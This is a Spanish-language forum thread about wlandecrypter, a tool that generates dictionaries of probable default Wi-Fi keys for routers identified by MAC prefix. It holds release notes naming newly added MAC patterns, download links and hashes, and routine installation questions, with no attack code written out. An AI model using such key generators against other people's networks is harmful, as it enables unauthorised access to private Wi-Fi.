Más Info -> README.txt
-
Ufffff, aunque llevo miles de años sin aparecer ni hacer nada en Wifiway - la 2.0 la he probado una sola vez =(:o) -, esto de escribir primero las claves "mas probables"* es una maravilla para WlanReaver en las redes con mas de un patron.
Muchisimas gracias, Niroz! ;)
*la estimacion previa y con baja representacion muestral daba un 69% de probabilidad, creo recordar.
-
Gracias Niroz ! Updating WlanRever.
Saludos
|FluiD|
-
Qué gracias ni que ;). Saludos y adelante.
-
http://www.seguridadwireless.net/archivos/wlandecrypter-1.3.2.tar.gz
-
alguien lo tiene en formato de modulo.. es que tengo el pendrive.....
-
.
-
Hola, tengo una duda, me descargado el programa para windows, tengo windows 7 lo abro y se cierra, nos es compatible? muchas gracias
-
Hola, tengo una duda, me descargado el programa para windows, tengo windows 7 lo abro y se cierra, nos es compatible? muchas gracias
Se abre y cierra porque es una aplicación para terminal, sin interfaz gráfica.
Seguramente te irá mejor con https://foro.seguridadwireless.net/aplicaciones/swifi-keygen-0-2/
Y si quieres aprender de verdad porque se abre y cierra busca "abrir terminal en windows", "msdos" en google, también puedes mirar esto: http://www.monografias.com/trabajos/manualdos/manualdos.shtml
Ya que preguntas por la versión de windows, porfa escribe en la sección de windows: https://foro.seguridadwireless.net/aplicaciones/
Byez.
-
wlandecrypter 1.3.3 (10.12.2011) <www.seguridadwireless.net>
Cambios:
- Añade mac C8:6C:87 (Cortesía de *dudux)
Descarga: http://www.box.com/s/d4aif0rehdxpnmvqfsv7
MD5: e14b2dce3e39274cfc798ebab8e2fafa
-
Alguien podría subir la nueva version (1.3.3) a la url donde está la anterior?
para generar un PKGBUILD y subirlo a AUR (https://aur.archlinux.org) más que nada.
Gracias
-
Alguien podría subir la nueva version (1.3.3) a la url donde está la anterior?
para generar un PKGBUILD y subirlo a AUR (https://aur.archlinux.org) más que nada.
Gracias
JUSTO , encima de tu post tienes el enlace , ... ^-^
-
Haber,si ya se q hay un enlace arriba pero ese no lo puedo uilizar porque requiere que el usuario entre con el navegador en la pagina para redirigirte,no es que no haya visto el enlace.
Me referia a subirlo a seguridadwireless.net/archivos para que el yaourt pueda acceder a el.
-
http://www.seguridadwireless.net/archivos/wlandecrypter-1.3.4.tar.gz
http://www.seguridadwireless.net/archivos/wlandecrypter-1.3.4.tar.gz.md5
MD5: 8dbc86051d3a6d0c10f35e744ffb15db wlandecrypter-1.3.4.tar.gz
* Actualizado v1.3.4: Octubre 2012 www.seguridadwireless.net (Equipo de Desarrollo live)
* Añadidos patrones nuevos sobre las mac's 40:4A:03 y 50:67:F0 ya existentes.
* Eliminados datos extras en el diccionario resultante dejando solo las claves.
*
(https://hwagm.elhacker.net/wp-content/uploads/2012/10/wlandecrypter134.png)
-
hola a todos estado buscando la manera de agregar Wlandecrypter directamente al wifislax 4.2 iso, lo e intentado con ultaiso, powerISO y no lo e conseguido alguien sabe si tengo q utilizar otro programa o cambiar de formato de tar.gz a lmz gracias espero no molestar con estas preguntas q para algunos no sera nada
-
Eso no es un modulo, es un archivo comprimido que tienes que descomprimir y compilar, en el primer post se explica como instalarlo ¿te lo has leído?
saludos